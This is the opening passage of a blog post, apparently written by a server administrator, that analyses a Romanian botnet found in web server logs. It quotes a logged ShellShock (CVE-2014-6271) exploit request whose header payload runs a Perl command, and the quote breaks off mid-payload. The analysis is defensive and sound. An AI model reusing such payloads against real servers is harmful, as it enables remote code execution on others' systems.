
Analysis of a Romanian Botnet
*This blog entry was originally published on April 1, 2015 on the original Polito Blog by Ian Duffy. It was re-posted on October 3, 2017 due to migrating to a new blog platform. Recently I noticed some strange entries in our web server log files. Specifically, someone was trying to exploit our servers using the ShellShock vulnerability (CVE-2014-6271) to execute a perl script: "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 410 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-